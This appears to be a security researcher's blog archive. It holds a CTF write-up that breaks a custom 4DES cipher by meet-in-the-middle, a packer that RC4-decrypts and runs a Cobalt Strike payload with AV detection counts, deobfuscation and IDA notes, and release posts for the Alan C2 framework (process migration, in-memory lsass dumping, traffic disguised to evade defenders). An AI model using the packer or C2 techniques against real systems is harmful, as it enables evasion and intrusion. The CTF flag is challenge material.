v14 = bcrypt_generate_symmetric_key(v11, &v23, &v27);
v15 = bcrypt_generate_symmetric_key(v19, &v21, &v27);

Do you see it? The last two operations reference the same exact value! By debugging the application we can notice this fact since the first two operations use the same key, invalidating the result. So the effective decryption process is:

P = D(E(D(E(C, k1), k1), k2), k3) = D(E(C, k2), k3)

So we downgraded the algorithm to a 2DES and if you have ever followed a cryptographic course, you know that there is a reason if we jumped from DES to 3DES by skipping 2DES.

Meet In the Middle

The reason why 2DES is considered not secure is for this specific attack. By quoting wikipedia:

When trying to improve the security of a block cipher, a tempting idea is to encrypt the data several times using multiple keys. One might think this doubles or even n-tuples the security of the multiple-encryption scheme, depending on the number of times the data is encrypted, because an exhaustive search on all possible combination of keys (simple brute-force) would take 2^(n-k) attempts if the data is encrypted with k-bit keys n times.

The MITM is a generic attack which weakens the security benefits of using multiple encryptions by storing intermediate values from the encryptions or decryptions and using those to improve the time required to brute force the decryption keys. This makes a Meet-in-the-Middle attack (MITM) a generic spaceโ€“time tradeoff cryptographic attack.

The MITM attack attempts to find the keys by using both the range (ciphertext) and domain (plaintext) of the composition of several functions (or block ciphers) such that the forward mapping through the first functions is the same as the backward mapping (inverse image) through the last functions, quite literally meeting in the middle of the composed function. For example, although Double DES encrypts the data with two different 56-bit keys, Double DES can be broken with 2^57 encryption and decryption operations.

Since we know that our key is 32 bit long we can break this encryption with 2^37 operations. Nice... in theory. I don't know about you, but my laptop is still not so powerful to break such a keyspace. There must be some other way to downsize the key.

Indeed, there is! If you take another look at the function that generates the key from a password you will notice that the final result is left shifted 5 times, this means that the least 5 important bits are always zero! With this information we can downgrade the key from 32 bit to 27 bit!

At this point I started to implement the algorithm, but 27 bit are still too much for my laptop. I have to confess that I was stuck at this point. Talking with the author, she told me that there is still a way to downgrade the key size from 27 to 24 bits.

I struggled a bit on this part, until I realized, the parity bit! It is pretty know that DES uses a key of 64 bits but the effective size is 56 bits. This is due to the fact that the last bit is used as parity bit and it is not consider in the encryption process. Since we have 3 full bytes (the last one is shifted by 5 so doesn't count), by removing 1 bit from each byte we reach the final size of 24 bits.

Finding the plaintext

At this point we have in place the theory and the feasibility of the attack but we miss one last piece, the plaintext to encrypt. Unfortunately the program doesn't seem to give any hints on the format of the plaintext, so I decided to take another look at the program. As every experienced reverse engineering in the world would do, I run the most sophisticated analysis, I run strings on the binary. I discovered some interesting strings like:

"Scrivi il messaggio e premi INVIO, control Z, INVIO... "
"Inserisci la password SEGRETA e premi INVIO!! "
"Stai per creare un messaggio segreto                    con"

those strings were effectively referenced in the binary. By taking a look at the referencing code I discovered that if the binary doesn't found the encrypted resource, it enters in another state and allows to create a secret message. So I removed the resource and started the program again. The image below show how to create a secret message.

Since I created a new protected message I'm finally able to see which is the screen displayed to the user when a message is correctly decrypted. From this screen I can see that the first 8 bytes are always the same and their value is: "Oggetto:". Finally we have all the missing pieces of our puzzle.

Break the rule!

We reached the end of the writeup, let's do a quick recap of the attack:

P = D(E(C, k2), k3) => E(P, k3) = E(C, k4) =>
E("Oggetto:", k3) = E("\xA8\xEC\xE8\x6E\x9D\xB5\xE1\xB7", k4)

I have to compute the two parts for each k3 and k4 until I found two keys that generates the same value.

So, the implementation of the Meet In The Middle attack is composed of two steps, in the first part I encrypt the plaintex with all keys from the 24 bit keyspace and save the result and the key. Then I proceed to encrypt the ciphertext with each possible key and try to find a match with the first step. If a match is found I broke the encryption.

On my laptop it took a while to complete. In the following result you can see the execution of the first step of the attack:

-=[ Start encrypt plaintext: 6/6/2019 2:54:27 PM ]=-
Start iteration 0 of 7 at 6/6/2019 2:54:27 PM
Start iteration 1 of 7 at 6/6/2019 3:07:01 PM
Start iteration 2 of 7 at 6/6/2019 3:18:45 PM
Start iteration 3 of 7 at 6/6/2019 3:32:16 PM
Start iteration 4 of 7 at 6/6/2019 3:45:15 PM
Start iteration 5 of 7 at 6/6/2019 3:58:26 PM
Start iteration 6 of 7 at 6/6/2019 4:10:37 PM
Start iteration 7 of 7 at 6/6/2019 4:22:27 PM
-=[ End encrypt plaintext: 6/6/2019 4:34:14 PM ]=-

And here is the second part of the attack where you can see that the password was successfully bruteforced:

-=[ Populate storage from pre-built table: 6/6/2019 5:56:37 PM ]=-
-=[ Start identify key: 6/6/2019 5:58:03 PM ]=-
Start iteration 0 of 7 at 6/6/2019 5:58:03 PM
Start iteration 1 of 7 at 6/6/2019 6:01:58 PM
Encrypt Password found: 20-8A-34-40-00-00-00-00
Decrypt Password found: 80-A0-DE-1C-00-00-00-00
-=[ End identify key: 6/6/2019 6:08:43 PM ]=-
-=[ Secret message: 6/6/2019 6:08:47 PM ]=-
Oggetto: Finchรฉ la barca va.

Quell'augel d'ebano, allora, cosรฌ tronfio e pettoruto
tentรฒ fino ad un sorriso il mio spirito abbattuto:
ยซSebben spiumato e torvo, - dissi, - un vile non sei tu
certo, o vecchio spettral corvo della tenebra di Pluto?
Quale nome a te gli araldi dร nno a corte di Re Pluto?ยป
Disse il corvo allor: ยซHM{2005d05af414ac92a3ffc5beecbd94f4}!ยป.

PS: questo ยซ4DESยป non mi sembra molto sicuro. ho dei seri dubbi sull'algo-
ritmo di hashing della password, e comunque quando si implementa un algorit-
mo non standard si rischia sempre di fare degli erroi grossolani. anche ba-
nali errori di copia-incolla possono essere fatali per la sicurezza. E poi
il logo รจ cosรฌ lento a disegnarsi! Troviamo un'alternativa?

Once that I retrieve the keys I'm able to decrypt the text and visualize the FLAG (which is HM{2005d05af414ac92a3ffc5beecbd94f4}), as can be seen from the following video:


This challenge was very entertaining, not because of the reversing part (that was pretty easy to be honest) but because was built with the idea to show how difficult is to implement a new cryptographic algorithm by demonstrating how a real world attack works.

Side Note

The challenge is full of funny comments having joke of hackers. The author told me that she created this challenge by considering a middle-aged developer.

The final message is an excerpt from the poem "The Raven" where the quote "Nevermore" was replaced with the MD5 of "Barbra Streisand" (the actual CTF flag value). This is a tribute to a meme that was popular at that time (actually I didn't realize this thing, it was the author that told me to search for that MD5).

Source Code

The full source code is on my Github account, I report here just the most important parts to break the encryption (for an updated version please visit the Github website).

namespace Hm0x14Writeup

open System
open System.Text
open System.IO
open System.Collections.Generic
open System.Reflection

module Program =    

 let mangleKey(k0: Int32, k1: Int32, k2: Int32, k3: Int32) = [|
  byte k0 <<< 5
  byte k1 <<< 1
  byte k2 <<< 1
  byte k3 <<< 1

 let getKeys() = seq {
  for i0=0 to 0x7 do
   Console.WriteLine("Start iteration {0} of 7 at {1} ", i0, DateTime.Now)
   for i1=0 to 0x7F do
    for i2=0 to 0x7F do
     for i3=0 to 0x7F do
      yield (mangleKey(i0, i1, i2, i3))

 let buildEncryptedTextTable(plainText: Byte array, storage: Dictionary<String, Byte array>) =
  Console.WriteLine("-=[ Start encrypt plaintext: {0} ]=-", DateTime.Now)

  |> Seq.iter(fun key ->
    let encryptedBuffer = Encryption.encrypt(plainText, key)
    storage.[BitConverter.ToString(encryptedBuffer)] <- key
   with _ -> ()

  Console.WriteLine("-=[ End encrypt plaintext: {0} ]=-", DateTime.Now)

 let populateStorage(storage: Dictionary<String, Byte array>) =
  if not <| Storage.storageExists() then
   let plainText = Encoding.UTF8.GetBytes("Oggetto:")
   buildEncryptedTextTable(plainText, storage)

 let findKey(encryptedText: Byte array, storage: Dictionary<String, Byte array>) =
  Console.WriteLine("-=[ Start identify key: {0} ]=-", DateTime.Now)
  let mutable (encKey, decKey) = (Array.empty<Byte>, Array.empty<Byte>)

  |> Seq.iter(fun key ->
    let encryptedBuffer = Encryption.encrypt(encryptedText, key) |> BitConverter.ToString
    if storage.ContainsKey(encryptedBuffer) then
     encKey <- storage.[encryptedBuffer]
     decKey <- key
     Console.WriteLine("Encrypt Password found: " + BitConverter.ToString(storage.[encryptedBuffer]))
     Console.WriteLine("Decrypt Password found: " + BitConverter.ToString(key))                
     Console.ReadLine() |> ignore
   with _ -> ()

  Console.WriteLine("-=[ End identify key: {0} ]=-", DateTime.Now)

  (encKey, decKey)

 let getCipherText() =
  let curDir = Path.GetDirectoryName(Assembly.GetEntryAssembly().Location)
  File.ReadAllBytes(Path.Combine(curDir, "4DES_SEGRETO"))

 let main argv = 
  let storage = new Dictionary<String, Byte array>()

  // decrypt the cipher text
  let ciphertext = getCipherText()     
  let (encKey, decKey) = findKey(ciphertext.[0..7], storage)

  // print the cipherText
  let secretMessage = Encryption.twoDesDecrypt(encKey, decKey, ciphertext)

Writing a packer in Sacara

Twitter: @s4tan

GitHub project: https://github.com/enkomio/sacara

Release: https://github.com/enkomio/sacara/releases/latest

Sacara packer script: https://gist.github.com/enkomio/35b14084c1422db6740b5ed98cdb2db7

The Sacara project

It is a while that I don't write a blog post and recently I had the opportunity to work again on the Sacara project. I really like this project since it allows me to:
  • write code in x86 Assembly since all the VM code is implemented in x86 Assembly
  • to better understand how to implement a simple programming language (you can find the Sacara grammar file here)
  • how to write an assembler.
My previous post on Sacara is more than 1 year old so it is a good time to see if the project has any issues that can be resolved. After trying to write a new script, I immediately realize which was the biggest defect, writing a program was quite a pain due to the awkward syntax. It is time to improve this aspect with some syntax sugar :).

I released a new version 2.4 which adds some directives and other features that allows to easier the task of writing of a new script, leaving the VM core almost untouched.

Writing a simple packer

As done in my latest post about Sacara, even in this one I'll try to see how the AV industry will behave by analyzing a malicious program. I'll write a simple program that executes a Sacara script which purpose is to decode and run a malicious content.

This is the typical behavior of a packer, in my case I'll just decode and run the embedded content as if it was a shellcode. In general a packer will correctly maps the PE in memory and executes it by locating the Original Entry Point (OEP) but I'll leave this aspect out.

This time I'll create a C project and linking the Sacara static library, in this way we will have just one binary (and not a bunch of files as in my .NET test project created in my previous post).

For my test I wanted to use a real malware so I looked for some good stuff in VT. In the end I decided to use an unpacked Cobalt Strike payload whit SHA-1: 83a490496a7ea9562d6e3eb9a12a224fe50875e7. This is a perfect fit for my case since all Cobalt Strike modules are packed in a way that can be executed as a shellcode starting for the DOS header (the same happens with the Metasploit meterpreter_loader).

The overall design is quite simple, I'll embed the encoded malicious content as a PE resource and will use a Sacara script to decode and execute it. The Sacara script will be embedded as a PE resource too. The task done by the C code is deadly simple, just read the needed resources, allocates a memory region and run the script by providing the input buffer.


I'll focus on the Sacara script, you can read the source code of the C code from the repository. The tasks done by the script are:
  1. Decode the password used to encrypt the malicious code
  2. RC4 decrypt the resource content
  3. Run the decrypted code
In order to easier the development and debugging of the script, I'll create various standalone scripts for each task and I'll merge them at the end. All the scripts in this post can be found in the test directory.

Decode the password used to encrypt the malicious code

As first step we want to retrieve the password used to encrypt the content. We don't want that a simple string search will reveals its value, so we will obfuscate it with a simple XOR operation by using a 1-byte key with value 0xA1.

Below you will find the relevant code with a simple test case, I think its comments are self explanatory.

// this routine will be used to stored the 
// script global data, all labels are global
proc global_data
 // encoded password
 byte 0xe0, 0xe1, 0xe2, 0xe3

proc decode_password(pwd, pwd_len) 
 .mov index, 0
 // read the byte to decode
 .mov pwd_offset, (pwd + index)
 .read.b pwd_offset 
 pop xored_char
 // decode the byte with hardcoded key
 .xor xored_char, 0xA1
 // write back the result
 pop xored_char
 .write.b pwd_offset, xored_char
 // check if completed
 .cmp index, pwd_len
 .inc index
 push decode_pwd_loop

proc main
 // result must be the first variable if I want
 // to retrieve the result with SacaraRun, so set it to 0
 .mov result, 0
 // invoke the routine to decode the password
 .decode_password(password, 4)
 // read the decoded password as a double word at the specified offset
 .read.dw password
 pop result
To test if it works, we will try to deobfuscate the buffer 0x41, 0x40, 0x43, 0x42. We have to first obfuscate it, so we will compute the XOR operation between the two integers 0x42434041 (little endian) and 0xA1A1A1A1, which result in 0xE3, 0xE2, 0xE1, 0xE0 (this is the same buffer that you will find at the top of the script).

Firs let's assemble it:
c:\SacaraAsm.exe test_decode_buffer.sacara

          -=[ Sacara SIL Assembler ]=-
Copyright (c) 2018-2019 Antonio Parata - @s4tan

[INFO] 2019-12-08 11:52:07 - VM code written to file: test_decode_buffer.sac
We can now test the script by running it, passing the input value 0x42434041 and expecting as result 0x42434041 (or 1111703617 in decimal notation) which is the little-endian hexadecimal notation of our buffer.
c:\SacaraRun.exe -p test_decode_buffer.sac 0x42434041
Execute file: c:\test_decode_bufferdecode_password.sac
Code execution result: 1111703617

RC4 decrypt the resource content

Our second and most complex step is the decryption of the buffer. In my previous post I used a simple XOR algorithm, for this post I decided to implement the RC4 cryptographic algorithm. If you are used to reverse malware you have probably encountered the usage of RC4 to encrypt configuration or code.

As in my previous script I'll use a lot of comments to make the code easy to understand (I also avoided some trivial optimization to avoid over complication). Since this code is quite long you can find the source code of this step in a test script, in this post I'll only show the KSA and PRGA phases.
proc ksa(password, password_length)
 .mov i, 0
 .mov j, 0

 // read the i-th byte from S array
 .read.b (S + i)
 pop S_i
 // read the i-th byte from password
 .read.b (password + (i % password_length))
 pop pwd_i
 // compute loop expression
 .mov j, ((j + S_i + pwd_i) % 256) 
 .swap(i, j)
 // check if I have to iterate
 .inc i 
 .cmp i, 256
 push ksa_loop

proc prga(buffer, buffer_length)
 .mov i, 0
 .mov j, 0
 .mov n, 0
 // update index i
 .mov i, ((i + 1) % 256) 
 // update index j
 .read.b (S + i) 
 pop S_i
 .mov j, ((j + S_i) % 256)
 // swap
 .swap(i, j)
 // read indexes
 .read.b (S + i) 
 pop S_i
 .read.b (S + j) 
 pop S_j
 // compute random
 .read.b (S + ((S_i + S_j) % 256))
 pop rnd
 // read n-th buffer value
 .read.b (buffer + n)
 pop buffer_n 
 // XOR with buffer and write back the result 
 .xor buffer_n, rnd
 pop encrypted_char
 .write.b (buffer + n), encrypted_char 

 // check if I have to iterate
 .inc n
 .cmp n, buffer_length
 push prga_loop

The assembling step is the same as before.

Run the decrypted resource

At this step we have the code in a decrypted form, we just have to run it. This can be done by the infrastructure code (the C code) or from Sacara. Since Sacara allows to invoke native code via the ncall instruction we will use this approach.

Build the code

Now we have all the pieces for our packer, once compiled the infrastructure code we can add the needed resources, that are:

  • DATA: contains the buffer that will be decrypted and executed.
  • SECRET: is the RC4 password that will beu sed to decrypt the buffer. It is XOR encoded with the 0x41 value.
  • SACARA: the Sacara code that will decrypt the buffer and execute it.

To add the resources you can use a simple utility that I wrote or any other PE explorer utility. Finally, the full source code of the Sacara packer can be found here.


As said my test will run a Cobalt Strike Payload encrypted with RC4 and the password: sacara_packer_password. I uploaded the file to VT and waited for the analysis, the result can be found here. We went from 52/70 to 24/69.

Not bad but to be honest I was expecting a better result. If you run the code in a real environment you will notice that the decryption of the code is quite CPU intensive and needs several seconds before to be invoked, this means that the identification of malicious content via emulation is improbable due to performance reason.

I decided to do a second test and upload the same program but without resources, this will make the program 100% safe. The result was very interesting, 12/69 AV flagged my sample as malicious. This means that they flagged the Sacara code as malicious and not real payload.

Conclusion and Future Work

This new version of Sacara improved the language in order to easier the development of a script. The next step is to provide an easy access to the Windows API in order to create more meaningful programs. Also, I want to improve the VM code in order to make it more resistant to reverse engineering.

Finally, I want to stress out that a single test case is not a valid reason to decide if an AV is good or not, so please take my result as a first step in the complex process of AV evaluation.

Deobfuscating C++ ADVobfuscator with Sojobo and the B2R2 binary analysis framework

Twitter: @s4tan
GitHub code: https://github.com/enkomio/Sojobo/tree/master/Src/Tools/ADVDeobfuscator

At Black Hat Europe 2014 - Amsterdam was presented a new obfuscation tool named ADVobfuscator. It is based on C++11 metaprogramming. The paper describes in depth how the strings and function calls are obfuscated.

ADVobfuscator demonstates how to use C++11/14 language to generate, at compile time, obfuscated code without using any external tool or a custom compiler.
Compile time obfuscators (like this one) are quite annoying to analyze since it is not easy to write a generic deobfuscator that it is based on code patterns recognition. In fact, the resulting binary code depends on the compiler, the used flags and so on. This will result in a series of corner cases that must be correctly handled to correctly deobfuscated the code. The worst part is that the handling of these corner cases might not be reused for a different sample that was compiled with a different compiler or with different flags. My idea to solve this problem, it is to write a deobfuscator that is based on flags extracted through the execution of generic heuristics. In this way, I can abstract the analysis from the code details.

Another interesting aspect of ADVObfuscator, it is that it was recently used to protect a malware sample that was analyzed in this very interesting blog post. In particular, in section "3. Latest variant of Team9 loader", it is possible to see a reference to the strings deobfuscation process.

In this blog post, I'll focus on the strings obfuscation part, by writing an utility that is able to decode the obfuscated strings. The deobfuscation utility uses the B2BR binary analysis framework to statically analyze the binary, and Sojobo to emulate the code.

The sample that I'll consider has SHA256 hash value: aaa9268b4a80f75eeb58b61cbd745523b1823d5adf54c615ad9ddf6b8fa0e806. It was used in a demo during my talk at HackInBo Safe Edition and can be downloaded from my GitHub repository.

Identify obfuscated strings

This is probably the most annoying part. We can't rely on specific code patterns, since according to the used compiler, the code might change. My idea was to abstract this concept and tries to identify interesting points, by using a series of heuristics. ADVObfuscator uses various methodologies to obfuscate the strings, some of them are reported below:

1400012AA    movdqa  xmm0, cs:xmmword_140023520          ; load obfuscated buffer
1400012B2    movdqu  [rbp+57h+var_90], xmm0
1400012B7    mov     rcx, r14
1400012BA loc_1400012BA:; CODE XREF: sub_1400011F4+D4โ†“j
1400012BA    mov     al, byte ptr [rbp+57h+var_90]
1400012BD    xor     byte ptr [rbp+rcx+57h+var_90+1], al ; deobfuscation
1400012C1    add     rcx, r15                            ; Increase counter
1400012C4    cmp     rcx, 0Eh                            ; check size
1400012C8    jb      short loc_1400012BA
1400012CA    mov     byte ptr [rbp+57h+var_90+0Fh], r14b ; set null byte
Unfortunately, not all deobfuscation tasks are implemented as in-line code, in some cases a function is invoked, as reported below.

140006161    movdqa  xmm0, cs:xmmword_140023800          ; load obfuscated buffer
140006169    lea     rcx, [rbp+var_30]                   ; pointer to the obfuscated buffer
14000616D    xor     eax, eax
14000616F    mov     [rbp+var_20], 627A6844h
140006176    movdqu  [rbp+var_30], xmm0
14000617B    mov     byte ptr [rbp+var_1C], al
14000617E    call    sub_140003684                       ; call deobfuscation function
140006183    mov     r9d, r15d
140003684 sub_140003684   proc near  ; CODE XREF: sub_140005EB8+2C6โ†“p
140003684    lea     rax, [rcx+1]                        ; skip first byte, which is used as key
140003688    mov     r9d, 13h                            ; set string size
14000368E    mov     r8, rax                             ; pointer to buffer to decode
140003691 loc_140003691:; CODE XREF: sub_140003684+19โ†“j
140003691    mov     dl, [rcx]                           ; read XOR key
140003693    xor     [r8], dl                            ; deobfuscation
140003696    inc     r8                                  ; increment buffer pointer
140003699    sub     r9, 1                               ; decrement counter and check for termination
14000369D    jnz     short loc_140003691
14000369F    mov     [rcx+14h], r9b
1400036A3    retn
1400036A3 sub_140003684   endp
In the later case, it is possible to see that the string size is hardcoded inside the function body and not passed as input parameter. This means that we have a lot of functions like that, that differ only for some minor changes (like the string size).

Heuristics definition

As said, my main idea is to analyze all the functions that the B2R2 framework is able to identify and extract the flags that are based on the heuristics that I created. You can find all the defined heuristics in the associated source code. An excerpt from that list is presented below:
The heurstics above are used for the following tasks:
  • Identify all functions that deobfuscate a string. This task is useful to cover the case of the deobfuscation process defered to another function.
  • Identify the start of the code in charge for the deobfuscation.
  • Identify the address of the buffer that will be deobfuscated. This is done by identifying the deobfuscation operation.
  • Identify the end of the code in charge for the deobfuscation.


At this point I have the following information: the functions that run a deobfuscation task and the related chunk of code in charge for this task. The final step is to emulate this code and read the deobfuscated string from memory. Before to run the emulation it is necessary to execute one final step. The heuristics might miss some important information, like the register that is used to increment the counter (in one of the example above we can see that r15 is used to increment the counter).

To cover this problem I used two strategies. In the first strategy, I do a backtrace analysis starting from the identified start address, and verify if the instruction is safe to be emulated. If so, I'll change the start address. The second strategy analyzes the instructions that should be emulated and if it notices that exists an operation that add two registers, I set the value of the source register, inside the emulator, to the value 1.
These strategies seem to be good enough to catch possible registers initialization code.

We can now run the emulator and read the decrypted string from memory.


Below is reported a short video of the execution of the deobfuscation tool on the considered sample. With these information it shouldn't be too difficult to patch the original file and to NOP the deobfuscation operations. I tested it on various samples and it seems to work properly. If you found any errors just send me a message on twitter.

Alan - A post exploitation framework

Twitter: @s4tan
Download: GitHub (use this repo to report issues)
Documentation: https://github.com/enkomio/AlanFramework/tree/main/doc

I decided to dedicate a bit of my free time to develop a new project: Alan, a post exploitation framework. Doing red-team activities is not my main job, but I like this field and, as a malware analyst, I analyze a lot of programs that have a very similar intent.

The Alan concept is simple: the operator creates an agent file that is executed on the compromised host, and receives commands from a server under to control of the operator. The goal of the project is to provide a framework that has as primary target red-team activities. I implemented it by using C/Assembly for the agent and F# as backend (with .NET core, this ensure the excution on various OS).

Alan is implemented by considering weaknesses and missing features that I found in some of the currently available red-teaming tools. For example, a lot of tool claims that the traffic with the server is encrypted but they embed the key inside the request, or, in other cases, the key can be retrieved if the binary is available for reversing (too often I found a key generation algorithm based on a seed that can be easily computed).

A post-exploitation tool

Alan supports a good amount of features allowing the operator to further comprimise the target after the initial exploitation. Alan agent can be deployed in various formats, such as: Executable, DLL, Powershell and Shellcode. Below you can find a video that shows how to create an agent and interact with it by launching a command-shell on the remote host.

The agent can be easily customized and flexibility is a key feature for Alan. The agent profile can be updated at runtime, this means that you can change server address or even the communication protocol! The video below shows how to change the agent profile at runtime, by specifying a different server port and moving from HTTP to HTTPS.

Security Operation

Beign caugth by a blue team is something that should be avoided if you don't want to lose access to your target. Unfortunately, network traffic is something that cannot be hidden. Alan encrypts the network traffic in a strong way, but even if encrypted the requests might look suspicious. To avoid to raise any alerts, the operator can increase the delay between two requests or customize the requests and server reponses to look as a normal HTTP traffic from a know application. The video below shows the following features:
  • Create a powershell agent
  • Migrate to notepad.exe process. When the migration is completed in the Fiddler window is possible to see that the process sending requests became notepad.exe
  • A command-shell is executed and the original agent powershell file is deleted. By deleting the file there is no trace of the agent on disk and the execution is performed only in-memory. Then, the operator downloads some files to his system
  • The HTTP network traffic is inspected. The agent network traffic looks like normal traffic to an nginx server with default installation

In the next release I'll implement additional features and strenght a bit the code to try to avoid easily detection by AVs ;)

Alan post-exploitation framework v4.0 released

Twitter: @s4tan
Download: GitHub
Documentation: https://github.com/enkomio/AlanFramework/tree/main/doc

I just released version 4.0 of my post-exploitation framework Alan. You can download the binaries and read the release notes at: https://github.com/enkomio/AlanFramework/releases/latest

I also made a video that shows the following features:

  • Creation of two agents, a x86 and a x64 version
  • Migration of agent x86 to a process with a different integrity level
  • Execution of a command-shell on the compromised host and the execution of the x64 agent directly from the command-shell
  • Migration of the x64 agent to another x64 process
  • Restart of the Alan server to show that the agents reconnect to the server after the restart (the agent session is not lost)

Alan c2 Framework v5.0 - All you can in-memory edition

Twitter: @s4tan
Download: https://github.com/enkomio/AlanFramework
Documentation: https://github.com/enkomio/AlanFramework/tree/main/doc

I just released version 5.0 of my C2 post-exploitation framework Alan. You can download the binaries and read the release notes at: https://github.com/enkomio/AlanFramework/releases/latest

My goal with the Alan project is to provide a post-exploitation framework that can help red-team operators to further compromise their targets. Tipically, each team has its preferred tools to exploit the target, an example is the pletora of tools that can perform the memory dump of the lsass process. Alan does not enforce any particular tool, instead it provides the ground to run whatever tools the operator like. All tools are executed in memory in the address space of a pre-configured host process, or injected into another process.

This feature is achieved by the introduction of the new command run. This command accepts a file path on the operator machine and executes it on the compromised host without touching the disk. It is possible to specify command-line arguments that are passed to the executed program (this feature is not so common in the other C2 framework ;)). For this reason I decided to name this version "All you can in-memory" :)

Other commands were also implemented that allow the operator to execute a program on the compromised host. In particular the command exec was added to execute a new process and the shell command was modified to accept an argument that is the command to execute (if no argument is specified, a command shell is presented to the operator).

Find below the video that shows the following features:

  • Creation of a x64 powershell agent.
  • In-memory execution of the nanodump utility by using the configured host program (raserver.exe in this case) and passing a command-line argument. The Process Hacker windows will display the execution of the raserver.exe process.
  • Execution of the program notepad.exe in background.
  • In-memory execution of the dumper utility by injecting the binary in the just created notepad process. In this case the raserver.exe is not executed.

Analyzing an IDA Pro anti-decompilation code

Twitter: @s4tan
GitHub: https://github.com/enkomio/

In this post I'll analyze a piece of code that induces IDA Pro to decompile the assembly in a wrong way. I'll propose a fix, but I'm open to more elegant solutions :)

The function that we want to decompile has the following assembly code (I'm using IDA Pro v7.6):

.text:1001BC95 56                  push    esi
.text:1001BC96 FF 74 24 10         push    [esp+4+arg_8]     
.text:1001BC9A 8B 74 24 10         mov     esi, [esp+8+arg_4] 
.text:1001BC9E 56                  push    esi
.text:1001BC9F FF 74 24 10         push    [esp+0Ch+arg_0]
.text:1001BCA3 52                  push    edx
.text:1001BCA4 51                  push    ecx
.text:1001BCA5 E8 57 20 FF FF      call    nullsub_1
.text:1001BCAA 8B 0A               mov     ecx, [edx]      
.text:1001BCAC 83 C4 14            add     esp, 14h
.text:1001BCAF 89 4E 0C            mov     [esi+0Ch], ecx
.text:1001BCB2 8B 42 04            mov     eax, [edx+4]
.text:1001BCB5 03 C1               add     eax, ecx
.text:1001BCB7 89 46 04            mov     [esi+4], eax
.text:1001BCBA 5E                  pop     esi
.text:1001BCBB C3                  retn

The function uses two arguments with an unconventional calling convention. If we decompile the code, we obtain:

int __cdecl sub_1001BC95(int a1, int a2)
  int *v2; // edx
  int v3; // ecx
  int result; // eax

  v3 = *v2;
  *(a2 + 12) = *v2;
  result = v3 + v2[1];
  *(a2 + 4) = result;
  return result;
In IDA Pro the v2 variable (corrisponding to the line at address 0x1001BCAA) is colored in red, since its value might be undefined.

Custom calling convention might cause some problems to the decompilation process (see this), but, in general, there exist an easy fix to it: it is enough to inform IDA Pro that the function uses a custom calling convention. By modifying the function, we can set the new type with the following definition:

int __usercall sub_1001BC95@<eax>(PUCHAR arg0@<edx>, int garbage, PUCHAR arg1)
with this new definition, the decompiled code now looks like the following:
int __usercall sub_1001BC95@<eax>(PUCHAR arg0@<edx>, int garbage, PUCHAR arg1)
  int *v1; // edx
  int v2; // ecx
  int result; // eax
  int v4; // [esp+Ch] [ebp+8h]

  v2 = *v1;
  *(v4 + 12) = *v1;
  result = v2 + v1[1];
  *(v4 + 4) = result;
  return result;
We haven't done any progress at all. The only place where we haven't checked is the nullsub_1 function, the problem must be in its call. If we analyze this function, we notice that it has an empty body, as shown below.

.text:1000DD01 C3                  retn
Why is this function causing problems? The answer is in the software convention used by the compiler. During the compilation, the compiler considers some registers as volatile. This means that the value of these registers, after a function call, should not be considered preserved ([1]). Among the volatile registers, there is EDX, which is exactly one of the registers used to pass a function parameter in the custom calling convention.

This code causes problem to the decompilation process that considers (correctly) the EDX register to have an undefined value after the function call.

I'm not aware of any particular IDA Pro command to inform the decompiler to not consider EDX as volatile, so the simpler solution that I found is to just remove the call instruction (I patched the bytes E8 57 20 FF FF with 90 90 90 90 90). The result is a much cleaner decompiled code, as shown below.

int __usercall sub_1001BC95@<eax>(PUCHAR arg0@<edx>, int garbage, PUCHAR arg1)
  PUCHAR v3; // ecx
  int result; // eax
  v3 = *arg0;
  *(arg1 + 3) = *arg0;
  result = &arg0[1][v3];
  *(arg1 + 1) = result;
  return result;
Now we can proceed to further improve the decompilation code (we can clearly see the usage of a struct in the code) now that the decompiled code represents the real intent of the assembly code.


I received a message on twitter and reddit that suggests to have a look at the __spoils keyword mentioned in this Igorโ€™s tip of the week post [2] (shame on me for not having found it).

Its meaning is exactly what we need to solve the problem in a more elegant and generic way. It is enough to change the nullsub_1 function definition by adding the __spoils keyword, as show below:

void __spoils<> nullsub_1(void)
The decompilation result of the function sub_1001BC95 is the same as before with the exception that the call to the nullsub_1 function is still there (it is not necessary to patch the bytes anymore).


[1] Register volatility and preservation
[2] Igorโ€™s tip of the week #51: Custom calling conventions

Alan c2 Framework v6.0: Alan + JavaScript = โ™ก

Twitter: @s4tan
Download: https://github.com/enkomio/AlanFramework/releases/latest
Documentation: https://github.com/enkomio/AlanFramework/tree/main/doc

Alan v6.0 was release with a new cool feature: JavaScript execution. The scripts are executed in memory and do not depend on any third party program. The scripts source code can be downloaded from the GitHub Alan repository.

Being able to extend the framework is a mandatory feature in today red-team tools. Each team has its own methodology to perform a red-team activity and being able to customize or extend the tool capabilities is mandatory. One of the main goal with Alan was to provide a framework that can be easily adapted to vairous modus-operandi. Alan v6.0 adds a new feature to support an easy extension, it allows the operator to execute JavaScript file directly in memory. This feature is implemented inside an Alan core module and does not depend on any third party program.

In other tools, this kind of feature requires the operator to compile C code by following a specific process. This might be overhelming and unecessary complex. Javascript is an easy language and even novices can become proficient in a short time.

However, being able to execute JavaScript code is not enough, since in most cases the operator needs to interact with native Windows function to perform a given action. Alan provides an interface to call native Windows functions by using the handy JavaScript syntax. This blog post explores the details of this feature and how to use it to extend the Alan capabilities.

Gettin Started

Executing a JavaScript file in Alan is extremyl easy, just use the run command and specify a file with .js extension. In order to call a Windwos function, Alan implements the Win32 module that exposes two methods: GetProcAddress and LoadLibrary. These are the basic methods to call virtually any Windows functions. Let's try to write a simple file that prints the process ID.

import * as win32 from 'Win32';

var kernel32 = win32.LoadLibrary("kernel32.dll");
var GetCurrentProcessId = win32.GetProcAddress(kernel32, "GetCurrentProcessId");
var IsWow64Process = win32.GetProcAddress(kernel32, "IsWow64Process");
var GetCurrentProcess = win32.GetProcAddress(kernel32, "GetCurrentProcess");

var my_pid = GetCurrentProcessId();
var is_wow64 = new Array(4);
IsWow64Process(GetCurrentProcess(), is_wow64);

var msg = "Hello world from Javascript executed in process: " + my_pid;
if (is_wow64[0] == 1)
	msg += " - I'm running under Wow64 :)";
The script opens the Win32 module in order to load the Kernel32 DLL by calling the LoadLibrary function. Using the obtained handle, the GetCurrentProcessId function address is resolved by using the GetProcAddress function. The other functions are resolved in the same way. You can now use the resolved functions by calling them as standard JavaScript functions. As final step, the script prints a string showing a message containing information extracted from the Windows APIs.

A fundamental step of the entire process is being able to easily test the script during the development stage. In this new Alan version, a new folder named tools was added to the Alan package. It contains the files cqjsx86.exe and cqjsx64.exe. These files are JavaScript interpreters in x86 and x64 version. Let's try to run our script with both files to see what result is produced (the --file option is used to specify the file path).

C:\Alan.v6.0.511.24\tools>cqjsx64.exe --file test.js
